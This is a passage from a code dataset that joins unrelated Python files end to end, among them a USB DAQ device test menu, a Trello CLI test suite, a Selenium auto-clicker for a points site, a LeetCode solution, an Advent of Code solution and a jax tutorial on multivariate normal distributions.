================================================ AUTHOR: RAJAT ============================================\n","repo_name":"Rajat-Morphle/Code_Templates","sub_path":"TCC_GUI.py","file_name":"TCC_GUI.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38158567564","text":"import time\nimport sys\nimport fcntl\nimport os\nfrom usb_1608FS_Plus import *\n\ndef toContinue():\n answer = input('Continue [yY]? 
')\n if (answer == 'y' or answer == 'Y'):\n return True\n else:\n return False\n\ndef main():\n # initialize the class\n try:\n usb1608FS_Plus = usb_1608FS_Plus()\n print(\"USB-1608FS_Plus device found.\")\n except:\n print('No USB-1608FS-Plus device found.')\n return\n\n# print out the calibration tables\n for chan in range(8):\n for gain in range(8):\n print('Calibration Table (Differential): Chan =',chan,' Range = ',gain, \\\n 'Slope = ',format(usb1608FS_Plus.table_AIn[chan][gain].slope,'.5f'),\\\n 'Intercept = ',format(usb1608FS_Plus.table_AIn[chan][gain].intercept,'.5f'))\n\n# print last known calibration date:\n mdate = usb1608FS_Plus.CalDate()\n print('\nMFG Calibration date: ', mdate)\n\n print(\"wMaxPacketSize = \", usb1608FS_Plus.wMaxPacketSize)\n\n while True:\n print(\"\nUSB-1608FS-Plus Testing\")\n print(\"----------------\")\n print(\"Hit 'b' to blink LED.\")\n print(\"Hit 'c' to test counter. \")\n print(\"Hit 'C' for continuous sampling\")\n print(\"Hit 'd' to read/write digital port.\")\n print(\"Hit 'e' to exit.\")\n print(\"Hit 'i' to test analog input. (differential)\")\n print(\"Hit 'I' to test analog input scan.\")\n print(\"Hit 'M' for information.\")\n print(\"Hit 'r' to reset the device.\")\n print(\"Hit 'S' to get status\")\n print(\"Hit 's' to get serial number.\")\n print(\"Hit 't' to test external trigger.\")\n\n ch = input('\n')\n\n if ch == 'b':\n count = int(input('Enter number of times to blink: '))\n usb1608FS_Plus.BlinkLED(count)\n elif ch == 'c':\n usb1608FS_Plus.ResetCounter()\n usb1608FS_Plus.DTristateW(0xf0)\n print('Connect DIO0 to CTR0')\n usb1608FS_Plus.DLatchW(0x0)\n toContinue()\n for i in range(100):\n usb1608FS_Plus.DLatchW(0x1)\n usb1608FS_Plus.DLatchW(0x0)\n count = usb1608FS_Plus.Counter()\n print(\"Count = \", count, \" Should read 100.\")\n elif ch == 'd':\n print(\"Testing Digital I/O ...\")\n print(\"connect pins DIO[0-3] <--> DIO[4-7]\")\n usb1608FS_Plus.DTristateW(0xf0)\n print(\"Digital Port Tristate Register = \", hex(usb1608FS_Plus.DTristateR()))\n while True:\n value = int(input('Enter a byte number [0-0xf]: '),16) & 0xf\n usb1608FS_Plus.DLatchW(value)\n value2 = usb1608FS_Plus.DLatchR()\n value3 = usb1608FS_Plus.DPort() >> 4\n print(\"The number you entered: \", hex(value3), \" Latched value: \", hex(value2))\n if toContinue() != True:\n break\n elif ch == 'i':\n print('Connect pin 1 <-> pin 21')\n chan = int(input('Select channel [0-7]: '))\n print('\t\t1. +/- 10.0V')\n print('\t\t2. +/- 5.0V')\n print('\t\t3. +/- 2.5V')\n print('\t\t4. +/- 2.0V')\n print('\t\t5. +/- 1.25V')\n print('\t\t6. +/- 1.0V')\n print('\t\t7. +/- 0.625V')\n print('\t\t8. +/- 0.3125V')\n gain = int(input('Select gain [1-8]: '))\n if gain == 1:\n gain = usb1608FS_Plus.BP_10_00V\n elif gain == 2:\n gain = usb1608FS_Plus.BP_5_00V\n elif gain == 3:\n gain = usb1608FS_Plus.BP_2_50V\n elif gain == 4:\n gain = usb1608FS_Plus.BP_2_00V\n elif gain == 5:\n gain = usb1608FS_Plus.BP_1_25V\n elif gain == 6:\n gain = usb1608FS_Plus.BP_1_00V\n elif gain == 7:\n gain = usb1608FS_Plus.BP_0_625V\n elif gain == 8:\n gain = usb1608FS_Plus.BP_0_3125V\n usb1608FS_Plus.DTristateW(0xf0)\n for i in range(20):\n usb1608FS_Plus.DPortW(0)\n time.sleep(0.01)\n value = usb1608FS_Plus.AIn(chan, gain)\n print('Channel: ',chan,' value =', hex(value),'\t',format(usb1608FS_Plus.volts(gain, value),'.3f'),'V')\n usb1608FS_Plus.DPortW(1)\n time.sleep(0.01)\n value = usb1608FS_Plus.AIn(chan, gain)\n print('Channel: ',chan,' value =', hex(value),'\t',format(usb1608FS_Plus.volts(gain, value),'.3f'),'V')\n elif ch == 'I':\n print('Testing Analog input scan')\n frequency = float(input('Enter desired frequency [Hz]: '))\n count = int(input('Enter number of scans [1-1024]: '))\n nchan = int(input('Enter number of channels [1-8]: '))\n print(\"\t\t1. +/- 10.0V\")\n print(\"\t\t2. +/- 5.0V\")\n print(\"\t\t3. +/- 2.5V\")\n print(\"\t\t4. +/- 2.0V\")\n print(\"\t\t5. +/- 1.25V\")\n print(\"\t\t6. +/- 1.0V\")\n print(\"\t\t7. +/- 0.625V\")\n print(\"\t\t8. +/- 0.3125V\")\n gain = int(input(\"Select gain [1-8]: \"))\n if gain == 1:\n gain = usb1608FS_Plus.BP_10_00V\n elif gain == 2:\n gain = usb1608FS_Plus.BP_5_00V\n elif gain == 3:\n gain = usb1608FS_Plus.BP_2_50V\n elif gain == 4:\n gain = usb1608FS_Plus.BP_2_00V\n elif gain == 5:\n gain = usb1608FS_Plus.BP_1_25V\n elif gain == 6:\n gain = usb1608FS_Plus.BP_1_00V\n elif gain == 7:\n gain = usb1608FS_Plus.BP_0_625V\n elif gain == 8:\n gain = usb1608FS_Plus.BP_0_3125V\n gains = [0]*8\n channels = 0\n for chan in range(nchan):\n gains[chan] = gain\n channels |= (0x1 << chan)\n usb1608FS_Plus.AInConfigW(gains)\n\n if frequency < 100:\n options = usb1608FS_Plus.IMMEDIATE_TRANSFER_MODE\n else:\n options = usb1608FS_Plus.BLOCK_TRANSFER_MODE\n\n usb1608FS_Plus.AInScanStop()\n usb1608FS_Plus.AInScanClearFIFO()\n \n usb1608FS_Plus.AInScanStart(count, frequency, channels, options)\n dataAIn = usb1608FS_Plus.AInScanRead(count)\n for scan in range(count):\n for channel in range(nchan):\n ii = scan*nchan + channel\n dataAIn[ii] = round(dataAIn[ii]*usb1608FS_Plus.table_AIn[channel][gain].slope + usb1608FS_Plus.table_AIn[channel][gain].intercept)\n print(\"Channel {0:d} Sample[{1:d}] = \".format(channel, ii), hex(dataAIn[ii]),\" Volts = {0:7.4f}\".format(usb1608FS_Plus.volts(gain,dataAIn[ii])))\n usb1608FS_Plus.AInScanStop()\n usb1608FS_Plus.AInScanClearFIFO()\n elif ch == 'C':\n print('Testing USB-1608FS-Plus Analog Input Scan in Continuous mode')\n nchan = int(input('Enter number of channels [1-8]: '))\n frequency = float(input('Enter sampling frequency [Hz]: '))\n print('Hit any key to exit')\n if frequency < 100:\n options = usb1608FS_Plus.IMMEDIATE_TRANSFER_MODE\n else:\n options = 0x0\n channels = 0\n for i in range(nchan):\n channels |= (0x1 << i)\n usb1608FS_Plus.AInScanStop()\n usb1608FS_Plus.AInScanClearFIFO()\n usb1608FS_Plus.AInScanStart(0, frequency, channels, options)\n flag = fcntl.fcntl(sys.stdin, fcntl.F_GETFL)\n fcntl.fcntl(sys.stdin, fcntl.F_SETFL, flag|os.O_NONBLOCK)\n j = 0\n while True:\n raw_data = usb1608FS_Plus.AInScanRead(128)\n print('Scan =', j, 'samples returned =', len(raw_data))\n j += 1\n c = sys.stdin.readlines()\n if 
(len(c) != 0):\n break\n fcntl.fcntl(sys.stdin, fcntl.F_SETFL, flag)\n usb1608FS_Plus.AInScanStop()\n usb1608FS_Plus.AInScanClearFIFO()\n elif ch == 'M':\n print(\"Manufacturer: %s\" % usb1608FS_Plus.getManufacturer())\n print(\"Product: %s\" % usb1608FS_Plus.getProduct())\n print(\"Serial No: %s\" % usb1608FS_Plus.getSerialNumber())\n elif ch == 'e':\n usb1608FS_Plus.udev.close()\n exit(0)\n elif ch == 'r':\n usb1608FS_Plus.Reset()\n elif ch == 'S':\n print(hex(usb1608FS_Plus.Status()))\n usb1608FS_Plus.printStatus()\n elif ch == 's':\n print(\"Serial No: %s\" % usb1608FS_Plus.getSerialNumber())\n elif ch == 't':\n print(\"Connect Pin 37 TRIG_IN to Pin 21 DIO0\")\n print(\"Trigger set to falling edge\")\n print(\"Sample 8 channels, 625 scans, 25000 Hz, +/- 2V\")\n usb1608FS_Plus.DTristateW(0x0) # set all pins to output\n counter = 0\n frequency = 25000\n count = 625\n nChan = 8\n channels = 0\n gain = usb1608FS_Plus.BP_2_00V\n gains = [0]*8\n for chan in range(nChan):\n gains[chan] = gain\n channels |= (0x1 << chan)\n usb1608FS_Plus.AInConfigW(gains) \n options = usb1608FS_Plus.BLOCK_TRANSFER_MODE | usb1608FS_Plus.TRIG_EDGE_FALLING\n usb1608FS_Plus.AInScanStart(count, frequency, channels, options)\n while(True): # loop forever\n time.sleep(1)\n usb1608FS_Plus.DLatchW(0x0)\n usb1608FS_Plus.DLatchW(0x1)\n usb1608FS_Plus.DLatchW(0x0)\n \n data = usb1608FS_Plus.AInScanRead(count)\n counter = counter + 1\n print('counter =', counter, 'data length is', len(data),' Expected ', count*(nChan))\n# for i in range(count*nChan):\n# print('data[',i,'] = ', hex(data[i]),'\\t',format(usb1608FS.volts(gain, data[i]),'.3f'),'V')\n# usb1608FS.AInStop()\n usb1608FS_Plus.AInScanStart(count, frequency, channels, options) # reset the scan\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wjasper/Linux_Drivers","sub_path":"USB/python/test-usb1608FS-Plus.py","file_name":"test-usb1608FS-Plus.py","file_ext":"py","file_size_in_byte":8956,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"18"} +{"seq_id":"35877687048","text":"# class Anton:\n# location = \"Новосибирск\"\n# def __init__(self, rost=56, ves=135):\n# self.height = rost\n# self.wright = ves\n# self.otkuda = Anton.location\n#\n# def __private(self):\n# pass\n#\n# def __private(self):\n# pass\n#\n# chelovek = Anton(10)\n# chelovek2 = Anton(57)\n# print(chelovek.height)\n\nclass Human:\n default_name = \"House\"\n\n def __init__(self,default_name, default_age):\n self.name = default_name\n self.age = default_age\n self.__money = 1\n self.__house= None\n\n def __make_deal(self,dom):\n if self.__money >= dom.final_price():\n self.__money -= dom.final_price()\n return True\n else:\n return False\n\n def buy_house(self, dom):\n if self.__make_deal(dom):\n dom.owner= self.name\n self.__house = dom\n return \"купил \"\n\nclass House():\n def __init__(self):\n self.__price = 5000\n\n def final_price(self):\n return self.__price - 500\n\n\nartem = Human(\"Глеб\", 5)\ndom1 = House()\n\nprint(artem.buy_house(dom1))\n\n","repo_name":"UWUreUWU/python","sub_path":"25/mimi.py","file_name":"mimi.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9450295839","text":"import os\nimport math\nfrom datetime import date\n\ndef writeData(endTime):\n\n fileName = \"userdata.txt\"\n file = open(fileName, \"a\")\n filesize = os.path.getsize(fileName)\n todaysDate = date.today().strftime('%Y-%m-%d')\n toWrite = \"\"\n\n if 
filesize != 0:\n toWrite = \"#\" + toWrite\n\n toWrite = toWrite + todaysDate + \"+\" + endTime\n print(\"Writing Data: \", toWrite + \"\\n\")\n file.write(toWrite)\n file.close()\n\ndef calcSeconds(input):\n array = input.split(\":\")\n seconds = int(array[1]) + 60*int(array[0])\n return seconds\n\ndef convertSecsToString(input):\n mins = math.floor(input/60)\n secs = math.floor(input % 60)\n ret = '{:02d}:{:02d}'.format(mins, secs)\n return ret\n\ndef getLargest():\n fileName = \"userdata.txt\"\n filesize = os.path.getsize(fileName)\n\n if filesize==0:\n return \"No poops yet!\"\n file = open(fileName, \"r\")\n \n string = file.read()\n array = string.split(\"#\")\n\n largestInt = -1\n largestString = \"\"\n\n for entry in array:\n array = entry.split(\"+\")\n secs = calcSeconds(array[1])\n if (secs > largestInt):\n largestInt = secs\n largestString = entry\n\n file.close()\n largestArray = largestString.split(\"+\")\n return \"Worst time - \" + largestArray[1] + \" (\" + largestArray[0] + \")\"\n\ndef getFastest():\n\n fileName = \"userdata.txt\"\n filesize = os.path.getsize(fileName)\n\n if filesize==0:\n return \"No poops yet!\"\n file = open(fileName, \"r\")\n \n string = file.read()\n array = string.split(\"#\")\n\n smallestInt = 9999999999999\n smallestString = \"\"\n\n for entry in array:\n array = entry.split(\"+\")\n secs = calcSeconds(array[1])\n if (secs < smallestInt):\n smallestInt = secs\n smallestString = entry\n\n file.close()\n smallestArray = smallestString.split(\"+\")\n return \"Best time - \" + smallestArray[1] + \" (\" + smallestArray[0] + \")\"\n\ndef getAverage():\n\n fileName = \"userdata.txt\"\n filesize = os.path.getsize(fileName)\n\n if filesize==0:\n return \"No poops yet!\"\n file = open(fileName, \"r\")\n \n string = file.read()\n array = string.split(\"#\")\n\n avgInt = 0\n i = 0\n for entry in array:\n array = entry.split(\"+\")\n secs = calcSeconds(array[1])\n avgInt = avgInt + secs\n i = i + 1\n \n avgInt = avgInt/i\n \n ret = convertSecsToString(avgInt)\n\n file.close()\n return \"Average poo - \" + ret\n\ndef getFirst():\n fileName = \"userdata.txt\"\n filesize = os.path.getsize(fileName)\n\n if filesize==0:\n return \"No poops yet!\"\n file = open(fileName, \"r\")\n \n string = file.read()\n array = string.split(\"#\")[0].split(\"+\")\n return \"First poop - \" + array[1] + \" (\" + array[0] + \")\"\n\n# Writes data\n# Returns Difference from last poo\ndef stop(endTime):\n\n fileName = \"userdata.txt\"\n filesize = os.path.getsize(fileName)\n \n if (filesize==0):\n writeData(endTime)\n return \"This was your first poo!\"\n\n writeData(endTime)\n file = open(fileName, \"r\")\n stringArray = file.read().split(\"#\")\n file.close()\n previousSeconds = calcSeconds(stringArray[-2].split(\"+\")[1])\n currentSeconds = calcSeconds(stringArray[-1].split(\"+\")[1])\n\n # scored a worse time\n if (currentSeconds > previousSeconds):\n difference = currentSeconds - previousSeconds\n ret = convertSecsToString(difference)\n return \"Slower than last time by \" + ret + \" :(\"\n\n # scored a better time\n if (currentSeconds < previousSeconds):\n difference = previousSeconds - currentSeconds\n ret = convertSecsToString(difference)\n return \"Faster than last time by \" + ret + \" :)\"\n\n if (currentSeconds == previousSeconds):\n return \"Same speed as last 
time.\"\n\n\n","repo_name":"kkd16/PitStop","sub_path":"timeFunctions.py","file_name":"timeFunctions.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71427127080","text":"import os\n\nimport pandas as pd\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport time\n\nimport datetime as dt\n\n\n\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.neural_network import MLPRegressor\n\n\n\nimport warnings\n\nwarnings.simplefilter('ignore')\nFOLDER = '../input/'\n\nOUTPUT = '../preprocessed/'\n\nos.listdir(FOLDER)\ndf_structures = pd.read_csv(os.path.join(FOLDER, 'structures.csv'))\n\ndf_distance = df_structures.merge(df_structures, how = 'left', on= 'molecule_name', suffixes = ('_0', '_1'))\n\n# remove same molecule\n\ndf_distance = df_distance.loc[df_distance['atom_index_0'] != df_distance['atom_index_1']]\n\ndf_distance['distance'] = np.linalg.norm(df_distance[['x_0','y_0', 'z_0']].values - \n\n df_distance[['x_1', 'y_1', 'z_1']].values, axis=1, ord = 2)\n\ndf_distance.head(10)\ndef get_interaction_data_frame(df_distance, num_nearest = 5):\n\n time_start = dt.datetime.now()\n\n print(\"START\", time_start)\n\n \n\n # get nearest 5 (num_nearest) by distances\n\n df_temp = df_distance.groupby(['molecule_name', 'atom_index_0', 'atom_1'])['distance'].nsmallest(num_nearest)\n\n \n\n # make it clean\n\n df_temp = pd.DataFrame(df_temp).reset_index()[['molecule_name', 'atom_index_0', 'atom_1', 'distance']]\n\n df_temp.columns = ['molecule_name', 'atom_index', 'atom', 'distance']\n\n \n\n time_nearest = dt.datetime.now()\n\n print(\"Time Nearest\", time_nearest-time_start)\n\n \n\n # get rank by distance\n\n df_temp['distance_rank'] = df_temp.groupby(['molecule_name', 'atom_index', 'atom'])['distance'].rank(ascending = True, method = 'first').astype(int)\n\n \n\n time_rank = dt.datetime.now()\n\n print(\"Time Rank\", time_rank-time_nearest)\n\n \n\n # pivot to get nearest distance by atom type \n\n df_distance_nearest = pd.pivot_table(df_temp, index = ['molecule_name','atom_index'], columns= ['atom', 'distance_rank'], values= 'distance')\n\n \n\n time_pivot = dt.datetime.now()\n\n print(\"Time Pivot\", time_pivot-time_rank)\n\n del df_temp\n\n \n\n columns_distance_nearest = np.core.defchararray.add('distance_nearest_', \n\n np.array(df_distance_nearest.columns.get_level_values('distance_rank')).astype(str) + \n\n np.array(df_distance_nearest.columns.get_level_values('atom')) )\n\n df_distance_nearest.columns = columns_distance_nearest\n\n \n\n # 1 / r^2 to get the square inverse same with the previous kernel\n\n df_distance_sq_inv_farthest = 1 / (df_distance_nearest ** 2)\n\n \n\n columns_distance_sq_inv_farthest = [col.replace('distance_nearest', 'distance_sq_inv_farthest') for col in columns_distance_nearest]\n\n\n\n df_distance_sq_inv_farthest.columns = columns_distance_sq_inv_farthest\n\n time_inverse = dt.datetime.now()\n\n print(\"Time Inverse Calculation\", time_inverse-time_pivot)\n\n \n\n df_interaction = pd.concat([df_distance_sq_inv_farthest, df_distance_nearest] , axis = 1)\n\n df_interaction.reset_index(inplace = True)\n\n \n\n time_concat = dt.datetime.now()\n\n print(\"Time Concat\", time_concat-time_inverse)\n\n \n\n return df_interaction\nfirst_100_molecules = df_structures['molecule_name'].unique()[:100]\n\ndf_interaction = 
get_interaction_data_frame(df_distance.loc[df_distance['molecule_name'].isin(first_100_molecules)])\ndf_interaction.head(20)","repo_name":"aorursy/new-nb-3","sub_path":"hervind_speed-up-coulomb-interaction-56x-faster.py","file_name":"hervind_speed-up-coulomb-interaction-56x-faster.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74665631720","text":"from friendsecure.node import Node\nfrom mock import MagicMock\nimport json\n\n\ndef test_message_received():\n class Screen(object):\n def __init__(self):\n self.addLine = MagicMock()\n\n screen = Screen()\n\n class Peer(object):\n def __init__(self, host='127.0.0.1', port=8888):\n self.host = host\n self.port = port\n\n protocol = MagicMock()\n protocol.transport = MagicMock()\n protocol.transport.getPeer = MagicMock(return_value=Peer())\n\n nod = Node('public_key', 'private_key', screen)\n host = '127.0.0.1'\n port = 8888\n nod._contacts[(host, port)] = protocol\n\n msg = {\n 'type': 'message',\n 'message': 'hello'\n }\n nod.message_received(msg, protocol)\n assert 1 == nod._screen.addLine.call_count\n assert '[THEM] hello\\n' == nod._screen.addLine.call_args[0][0]\n\n\ndef test_send_message():\n nod = Node('public_key', 'private_key', MagicMock())\n host = '127.0.0.1'\n port = 8888\n protocol = MagicMock()\n nod._contacts[(host, port)] = protocol\n msg = {\n 'type': 'message',\n 'message': 'hello'\n }\n nod.send_message(host, port, msg)\n assert 1 == protocol.sendMessage.call_count\n assert msg == protocol.sendMessage.call_args[0][0]\n","repo_name":"hpk42/p4p","sub_path":"tests/test_node.py","file_name":"test_node.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"32244234198","text":"import csv\r\nimport shutil\r\nimport os\r\n\r\nfrom click.testing import CliRunner\r\nimport pytest\r\n\r\nfrom trello_cli.cli import create_board, create_card, add_comment, add_label, initialize\r\n\r\nDATA_DIR = \"data\"\r\nAUTH_DIR = \"auth\"\r\nBOARD_ID = \"12345\"\r\nCARD_ID = \"123456\"\r\nLABEL_IDS = [\"4\", \"5\", \"6\", \"7\"]\r\nLIST_IDS = [\"1\", \"2\", \"3\"]\r\nBOARD_CONTENT = \"test_board\"\r\nCARD_CONTENT = \"test_card\"\r\nLABEL_COLORS = [\"yellow\", \"red\", \"blue\", \"green\"]\r\nLIST_CONTENT = \"test_list\"\r\n\r\n\r\n@pytest.fixture(scope=\"session\", autouse=True)\r\ndef resource():\r\n if os.path.isdir(DATA_DIR):\r\n shutil.rmtree(DATA_DIR)\r\n initialize(test=True)\r\n yield\r\n if os.path.isdir(DATA_DIR):\r\n shutil.rmtree(DATA_DIR)\r\n\r\n\r\ndef test_create_board(mock_create_board):\r\n runner = CliRunner()\r\n with mock_create_board(BOARD_ID, BOARD_CONTENT):\r\n result = runner.invoke(create_board, [BOARD_CONTENT])\r\n assert result.exit_code == 0\r\n assert result.output == \"Board successfully created.\\n\"\r\n with open(os.path.join(\"data\", \"board.csv\")) as f:\r\n csv_reader = csv.reader(f, delimiter=\",\")\r\n content = [r for r in csv_reader if r]\r\n assert len(content) == 1\r\n for row in content:\r\n assert row[0] == BOARD_ID\r\n assert row[1] == BOARD_CONTENT\r\n\r\n\r\ndef test_create_card(mock_create_card):\r\n runner = CliRunner()\r\n with mock_create_card(CARD_ID, CARD_CONTENT, BOARD_ID, LIST_IDS):\r\n result = runner.invoke(create_card, [BOARD_CONTENT, \"Done\", CARD_CONTENT])\r\n assert result.exit_code == 0\r\n assert result.output == \"Card successfully created.\\n\"\r\n with open(os.path.join(\"data\", 
\"card.csv\")) as f:\r\n csv_reader = csv.reader(f, delimiter=\",\")\r\n content = [r for r in csv_reader if r]\r\n assert len(content) == 1\r\n for row in content:\r\n assert row[0] == BOARD_ID\r\n assert row[1] == LIST_IDS[2]\r\n assert row[2] == CARD_ID\r\n assert row[3] == CARD_CONTENT\r\n\r\n\r\ndef test_add_label(mock_add_label):\r\n runner = CliRunner()\r\n with mock_add_label(LABEL_IDS, BOARD_ID, '', LABEL_COLORS, CARD_ID):\r\n result = runner.invoke(add_label, [BOARD_CONTENT, \"Done\", CARD_CONTENT, LABEL_COLORS[0]])\r\n assert result.exit_code == 0\r\n assert result.output == \"Label successfully added.\\n\"\r\n with open(os.path.join(\"data\", \"label.csv\")) as f:\r\n csv_reader = csv.reader(f, delimiter=\",\")\r\n content = [r for r in csv_reader if r]\r\n assert len(content) == len(LABEL_COLORS)\r\n for i, row in enumerate(content):\r\n assert row[0] == LABEL_IDS[i]\r\n assert row[1] == BOARD_ID\r\n assert row[2] == ''\r\n assert row[3] == LABEL_COLORS[i]\r\n\r\n\r\ndef test_add_comment(mock_add_comment):\r\n runner = CliRunner()\r\n with mock_add_comment(CARD_ID):\r\n result = runner.invoke(add_comment, [BOARD_CONTENT, \"Done\", CARD_CONTENT, LABEL_COLORS[0]])\r\n assert result.exit_code == 0\r\n assert result.output == \"Comment successfully added.\\n\"\r\n","repo_name":"erayozer17/trello_tool","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33085372994","text":"import sys\nimport rlogin\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\nfrom time import sleep\n\nlogin_url = \"https://ssl.realworld.jp/auth/?site=gendama_jp&rid=&af=&frid=&token=&goto=http%3A%2F%2Fwww.gendama.jp%2Fforest%2F\"\nrloginCls = rlogin.Rlogin(login_url, \"settings\")\ndriver = rloginCls.get_driver_no_ext()\ndriver = rloginCls.login(driver)\n\narticle = driver.find_element_by_tag_name(\"article\")\ndiv_tags = article.find_elements_by_tag_name(\"div\")\nfind = False\nfor tag in div_tags:\n\ttry:\n\t\ta_tags = tag.find_elements_by_tag_name(\"a\")\n\t\tfor a_tag in a_tags:\n\t\t\timg_tags = a_tag.find_elements_by_tag_name(\"img\")\n\t\t\tfor img_tag in img_tags:\n\t\t\t\tsrc = img_tag.get_attribute('src')\n\t\t\t\tif str(src).find('star.gif') > -1:\n\t\t\t\t\tdriver.execute_script(\"arguments[0].click();\", a_tag)\n\t\t\t\t\tfind = True\n\t\t\t\t\tbreak\n\t\t\tif find == True:\n\t\t\t\tbreak\n\t\tif find == True:\n\t\t\tbreak\n\n\texcept NoSuchElementException:\n\t\tcontinue\n\nforest = driver.find_element_by_css_selector(\"div#forestBox\")\nosusume = forest.find_element_by_css_selector(\"div#osusumemori\")\nboxes = osusume.find_elements_by_css_selector(\"div.osusume_box\")\nlinks = []\nfor tag in boxes:\n\ta_tag = tag.find_element_by_tag_name(\"a\")\n\tlinks.append(str(a_tag.get_attribute('href')))\n\nfor link in links:\n\tprint(link)\n\tdriver.get(link)\n\ndriver.quit()","repo_name":"takadev/auto_point","sub_path":"gen_forest.py","file_name":"gen_forest.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17957229775","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File : maxArea.py\n# Author: PengLei\n# Date : 2019/4/2\n\n'''给定 n 个非负整数 a1,a2,...,an,每个数代表坐标中的一个点 (i, ai) 。在坐标内画 n 条\n垂直线,垂直线 i 的两个端点分别为 (i, ai) 和 (i, 0)。找出其中的两条线,使得它们与 x 
轴共\n同构成的容器可以容纳最多的水。\n说明:你不能倾斜容器,且 n 的值至少为 2。'''\n\nclass Solution:\n # 暴力解法\n def maxArea(height):\n maxA = 0\n for i in range(len(height)):\n for j in range(i+1, len(height)):\n if (j-i)*min(height[i], height[j]) > maxA:\n maxA = (j-i)*min(height[i], height[j])\n # print(maxA)\n return maxA\n\n # 动态规划\n def maxArea1(height):\n maxA = 0\n start = 0\n end = len(height) - 1\n while start < end:\n maxA = max(maxA, min(height[start], height[end]) * (end - start))\n if height[start] < height[end]:\n start += 1\n else:\n end -= 1\n return maxA\n\n\nprint(Solution.maxArea1([1,8,6,2,5,4,8,3,7]))","repo_name":"Dwyanepeng/leetcode","sub_path":"maxArea.py","file_name":"maxArea.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70574507879","text":"from chatterbot import ChatBot\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\n\n# Create a chatbot instance\nchatbot = ChatBot('MyChatBot')\n\n# Create and set up a new trainer\ntrainer = ChatterBotCorpusTrainer(chatbot)\n\n# Train the chatbot on English language data\ntrainer.train('chatterbot.corpus.english')\n\n# Chat with the bot\nprint(\"Bot: Hello! How can I help you today?\")\n\nwhile True:\n user_input = input(\"You: \")\n \n if user_input.lower() == 'exit':\n print(\"Bot: Goodbye!\")\n break\n \n response = chatbot.get_response(user_input)\n print(\"Bot:\", response)\n","repo_name":"onakogagase/ForHer","sub_path":"python/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37938627859","text":"with open ('day2_input.txt') as file:\n data = file.read().split(\"\\n\")\n \n #print (data)\n \n # Part 1 Strategy\n # A for Rock, B for Paper, and C for Scissors\n # X for Rock, Y for Paper, and Z for Scissors\n # The score for a single round is the score for the shape you selected\n #(1 for Rock, 2 for Paper, and 3 for Scissors) plus the score for the outcome of the round\n #(0 if you lost, 3 if the round was a draw, and 6 if you won).\n \nstrategy_pt1 = {\n \"A X\":4, \"A Y\":8, \"A Z\":3,\n \"B X\":1, \"B Y\":5, \"B Z\":9,\n \"C X\":7, \"C Y\":2, \"C Z\":6,\n} # create a dictionaty of possbile combinations and scores\n\ntotal_score_pt1=0\n\nfor i in data:\n if i in strategy_pt1: # to handle KeyError \n total_score_pt1+=strategy_pt1[i]\n #print(total_score)\n \nprint ('Answer part1:', total_score_pt1) \n\n# Part 2 strategy:\n# X means you need to lose\n# Y means draw\n# Z means you need to win\n\nstrategy_pt2 = {\n \"A X\":3, \"A Y\":4, \"A Z\":8,\n \"B X\":1, \"B Y\":5, \"B Z\":9,\n \"C X\":2, \"C Y\":6, \"C Z\":7,\n} \n \ntotal_score_pt2=0\n\nfor i in data:\n if i in strategy_pt2: # to handle KeyError \n total_score_pt2+=strategy_pt2[i]\n \nprint ('Answer part2:', total_score_pt2) \n\n ","repo_name":"biljanajelic/advent-of-code-2022","sub_path":"day2/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42745256976","text":"import jax\nimport jax.numpy as jnp\n\nfrom interp.tools.multivariate_normal import MultivariateNormal\nfrom interp.tools.immutable_dict import assign, assign_f, keep_only_f, operate, operate_f\n\n# %%\n\n\"\"\"\nWe can construct multivariate normal distributions by supplying a mean and a\ncovariance matrix.\n\"\"\"\n\n# %%\n\nx = MultivariateNormal(jnp.array([1, 
2.0]), jnp.array([[1, 0.1], [0.1, 3.0]]))\n\nprint(x.mean_as())\nprint(x.covariance_as())\n\n# %%\n\n\"\"\"\nLinear functions can be applied.\n\"\"\"\n\n# %%\n\nmul_3 = x.lin_op(lambda x: x * 3)\n\nprint(mul_3.mean_as())\nprint(mul_3.covariance_as())\n\n# %%\n\nmul_mat = x.lin_op(lambda x: jnp.array([[-1.0, 3.0], [0.01, 0.02]]) @ x)\n\nprint(mul_mat.mean_as())\nprint(mul_mat.covariance_as())\n\n# %%\n\n\"\"\"\nWe can also transform the type and shape of the data.\n\"\"\"\n\n# %%\n\nx_dict = x.lin_op(lambda x: {\"a\": x[0].reshape(1, 1, 1), \"b\": x[1]})\n\nprint(x_dict.mean_as())\nprint(x_dict.covariance_as())\n\n# %%\n\n\"\"\"\nassign is from interp.tools.immutable_dict which contains various functions for\noperating on dictionaries in a more functional way.\n\nThe more functional approach is often nicer for working with multivariate\nnormals which hold various tensors in a dictionary.\n\n(Detail: Also, jax doesn't like 